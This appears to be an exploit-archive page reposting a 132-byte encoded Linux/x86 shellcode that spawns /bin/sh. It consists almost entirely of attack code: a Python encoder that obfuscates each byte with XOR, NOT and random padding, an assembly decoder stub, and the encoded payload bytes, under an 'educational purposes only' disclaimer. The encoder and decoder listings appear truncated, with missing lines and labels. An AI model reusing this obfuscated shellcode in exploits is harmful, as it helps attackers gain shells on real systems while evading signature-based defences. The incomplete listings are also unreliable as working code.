Linux/x86 not + xorn + random encoded /bin/sh shellcode (132 bytes) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-10-04 |
Type : shellcode |
Platform : linux_x86
This exploit / vulnerability Linux/x86 not + xorn + random encoded /bin/sh shellcode (132 bytes) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Date: 4th October 2019
# Shellcode Author: @bolonobolo - https://bolonobolo.github.io
# Tested on: Linux x86
if x < 128:
# XOR Encoding with 0xDD
x = x^0xDD
# placeholder for XOR is 0xbb
encoded += '\\xbb'
encoded += '\\x'
encoded += '%02x' % x
else:
# NOT encoding
x = ~x
# placeholder for NOT is 0xcc
encoded += '\\xcc'
encoded += '\\x'
encoded += '%02x' % (x & 0xff)
# 0xaa is 170 in dec and the others placeholders are > of 170
encoded += '\\x%02x' % random.randint(1,169)
decoder:
; the sequence of the chars in shellcode is:
; placehlder,obfuscated shellcode char,random char
pop esi
lea edi, [esi]
xor eax, eax
xor ebx, ebx
mov bl, byte [esi + eax + 1]
mov byte [edi], bl
not byte [edi]
inc edi
add al, 3
jmp short switch
call_decoder:
call decoder
shellcode: db
0xbb,0xec,0x73,0xcc,0x3f,0x9d,0xbb,0x8d,0x51,0xbb,0xb5,0x1b,0xbb,0xb3,0x22,0xbb,0xf2,0x79,0xbb,0xae,0x8e,0xbb,0xb5,0x61,0xbb,0xb5,0x3d,0xbb,0xf2,0x6e,0xbb,0xf2,0x9f,0xbb,0xbf,0x10,0xbb,0xb4,0x89,0xcc,0x76,0x2d,0xcc,0x1c,0x2f,0xbb,0x8d,0x91,0xcc,0x76,0x7e,0xcc,0x1d,0x92,0xbb,0x8e,0x80,0xcc,0x76,0x7b,0xcc,0x1e,0xa7,0xcc,0x4f,0x7f,0xbb,0xd6,0x2b,0xcc,0x32,0x24,0xcc,0x7f,0x37,0xaa